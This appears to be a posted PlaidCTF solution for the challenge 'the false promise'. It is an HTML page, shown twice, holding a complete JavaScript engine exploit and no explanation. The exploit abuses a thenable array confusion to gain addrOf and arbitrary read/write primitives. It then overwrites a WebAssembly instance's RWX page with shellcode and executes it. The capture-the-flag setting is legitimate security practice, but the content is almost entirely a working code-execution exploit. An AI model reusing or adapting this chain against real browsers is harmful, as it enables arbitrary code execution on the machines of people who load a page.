hkraw · April 18, 2021 19:57
diff --git a/plaidCTF-the-false-promise.html b/plaidCTF-the-false-promise.html
 <html>
 <head>
  <script>
   ( async() => {

     let gc = function() {
      for(let i = 0; i < 100; i++) {
       new ArrayBuffer(0x10000000);
      }
     }

     let print = function( str ) {
      console.log( str );
     }

     let c_b = new ArrayBuffer(8);
     let f_v = new Float64Array(c_b);
     let i_v = new BigUint64Array(c_b);

     BigInt.prototype.hex = function() {
      return '0x' + this.toString(16);
     };

     BigInt.prototype.i2f = function() {
      i_v[0] = this;
      return f_v[0];
     }

     BigInt.prototype.smi2f = function() {
      i_v[0] = this << 32n;
      return f_v[0];
     }

     BigInt.prototype.shl32 = function() {
      return this << 32n;
     }

     BigInt.prototype.shr32 = function() {
      return this >> 32n;
     }

     Number.prototype.f2i = function() {
      f_v[0] = this;
      return i_v[0];
     }

     Number.prototype.f2smi = function() {
      f_v[0] = this;
      return i_v[0] >> 32n;
     }

     Number.prototype.f2il = function() {
      f_v[0] = this;
      return i_v[0] & 0xffffffffn;
     }

     Number.prototype.i2f = function() {
      return BigInt(this).i2f();
     }

     Number.prototype.smi2f = function() {
      return BigInt(this).smi2f();
     }

     var wasm_code = new Uint8Array([
      0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
      1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
      132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
      0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
      128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
      105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
      0,65,42,11
     ]);

     var wasm_mod = new WebAssembly.Module(wasm_code);
     var wasm_instance = new WebAssembly.Instance(wasm_mod);
     var main = wasm_instance.exports.main;

     Array.prototype.then = Promise.prototype.then;
     let thenable = [13.37];
     let obj = [];
     let o = [ {} ];
     let simple_array = [1.1,2.2,3.3,4.4,5.5];

     let t = setTimeout( () => {
      let object_map = thenable[10].f2il();
      let double_map = thenable[1].f2il();

      print("[*] Object map: " + object_map.hex());
      print("[*] Double map: " + double_map.hex());

      function addrOf( obj ) {
       o[0] = obj;
       return thenable[6].f2il();
      }

      function arbRead( where ) {
       thenable[19] = ( (0x42424242n).shl32() + where ).i2f();
       return simple_array[0].f2i();
      }

      function arbWrite( where, what ) {
       thenable[19] = ( (0x42424242n).shl32() + where ).i2f();
       simple_array[0] = what.i2f();
      }

      var buf = new ArrayBuffer(0x100);
      var dataview = new DataView(buf);
      var buff_addr = addrOf(buf);

      var wInstance = addrOf(wasm_instance);
      print("[*] Wasm instance: " + wInstance.hex());
      var rwx_page = arbRead(wInstance + 0x60n);
      print("[*] RWX PAGE: " + rwx_page.hex());
      print("[*] Array buffer: " + buff_addr.hex());
      arbWrite(buff_addr + 0xcn, rwx_page);

      print("[*] Copy shellcode.");
      /* Generated using pwntools ./flag_printer */
      let shellcode = [
       0x101b848,0x1010101,0x48500101,0x68632eb8,0x69722e6f,0x4314801,
       0xe7894824,0xb848726a,0x72705f67,0x65746e69,0x1b84850,0x1010101,
       0x50010101,0x622cb848,0x672e2f01,0x3148606d,0xb8482404,0x1010101,
       0x1010101,0x2eb84850,0x2e6f6863,0x48016972,0x31240431,0x136a56f6,
       0xe601485e,0x5e186a56,0x56e60148,0x485e186a,0x4856e601,0x16ae689,
       0x31240cfe,0x894852d2,0x583b6ae2,0x9090050f
      ];

      for(let i = 0; i < shellcode.length; i++) {
       dataview.setUint32(4 * i, shellcode[i], true);
      }
      print("[*] Shell!!.");
      main();
     }, 500);
     await thenable;
    })();
   </script>
  </head>
 </html>
	<html>
	<head>
	<script>
	( async() => {

	let gc = function() {
	for(let i = 0; i < 100; i++) {
	new ArrayBuffer(0x10000000);
	}
	}

	let print = function( str ) {
	console.log( str );
	}

	let c_b = new ArrayBuffer(8);
	let f_v = new Float64Array(c_b);
	let i_v = new BigUint64Array(c_b);

	BigInt.prototype.hex = function() {
	return '0x' + this.toString(16);
	};

	BigInt.prototype.i2f = function() {
	i_v[0] = this;
	return f_v[0];
	}

	BigInt.prototype.smi2f = function() {
	i_v[0] = this << 32n;
	return f_v[0];
	}

	BigInt.prototype.shl32 = function() {
	return this << 32n;
	}

	BigInt.prototype.shr32 = function() {
	return this >> 32n;
	}

	Number.prototype.f2i = function() {
	f_v[0] = this;
	return i_v[0];
	}

	Number.prototype.f2smi = function() {
	f_v[0] = this;
	return i_v[0] >> 32n;
	}

	Number.prototype.f2il = function() {
	f_v[0] = this;
	return i_v[0] & 0xffffffffn;
	}

	Number.prototype.i2f = function() {
	return BigInt(this).i2f();
	}

	Number.prototype.smi2f = function() {
	return BigInt(this).smi2f();
	}

	var wasm_code = new Uint8Array([
	0, 97,115,109, 1, 0, 0, 0, 1,133,128,128,128, 0,
	1, 96, 0, 1,127, 3,130,128,128,128, 0, 1, 0, 4,
	132,128,128,128, 0, 1,112, 0, 0, 5,131,128,128,128,
	0, 1, 0, 1, 6,129,128,128,128, 0, 0, 7,145,128,
	128,128, 0,2,6,109,101,109,111,114,121,2,0,4,109,97,
	105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
	0,65,42,11
	]);

	var wasm_mod = new WebAssembly.Module(wasm_code);
	var wasm_instance = new WebAssembly.Instance(wasm_mod);
	var main = wasm_instance.exports.main;

	Array.prototype.then = Promise.prototype.then;
	let thenable = [13.37];
	let obj = [];
	let o = [ {} ];
	let simple_array = [1.1,2.2,3.3,4.4,5.5];

	let t = setTimeout( () => {
	let object_map = thenable[10].f2il();
	let double_map = thenable[1].f2il();

	print("[*] Object map: " + object_map.hex());
	print("[*] Double map: " + double_map.hex());

	function addrOf( obj ) {
	o[0] = obj;
	return thenable[6].f2il();
	}

	function arbRead( where ) {
	thenable[19] = ( (0x42424242n).shl32() + where ).i2f();
	return simple_array[0].f2i();
	}

	function arbWrite( where, what ) {
	thenable[19] = ( (0x42424242n).shl32() + where ).i2f();
	simple_array[0] = what.i2f();
	}

	var buf = new ArrayBuffer(0x100);
	var dataview = new DataView(buf);
	var buff_addr = addrOf(buf);

	var wInstance = addrOf(wasm_instance);
	print("[*] Wasm instance: " + wInstance.hex());
	var rwx_page = arbRead(wInstance + 0x60n);
	print("[*] RWX PAGE: " + rwx_page.hex());
	print("[*] Array buffer: " + buff_addr.hex());
	arbWrite(buff_addr + 0xcn, rwx_page);

	print("[*] Copy shellcode.");
	/* Generated using pwntools ./flag_printer */
	let shellcode = [
	0x101b848,0x1010101,0x48500101,0x68632eb8,0x69722e6f,0x4314801,
	0xe7894824,0xb848726a,0x72705f67,0x65746e69,0x1b84850,0x1010101,
	0x50010101,0x622cb848,0x672e2f01,0x3148606d,0xb8482404,0x1010101,
	0x1010101,0x2eb84850,0x2e6f6863,0x48016972,0x31240431,0x136a56f6,
	0xe601485e,0x5e186a56,0x56e60148,0x485e186a,0x4856e601,0x16ae689,
	0x31240cfe,0x894852d2,0x583b6ae2,0x9090050f
	];

	for(let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4 * i, shellcode[i], true);
	}
	print("[*] Shell!!.");
	main();
	}, 500);
	await thenable;
	})();
	</script>
	</head>
	</html>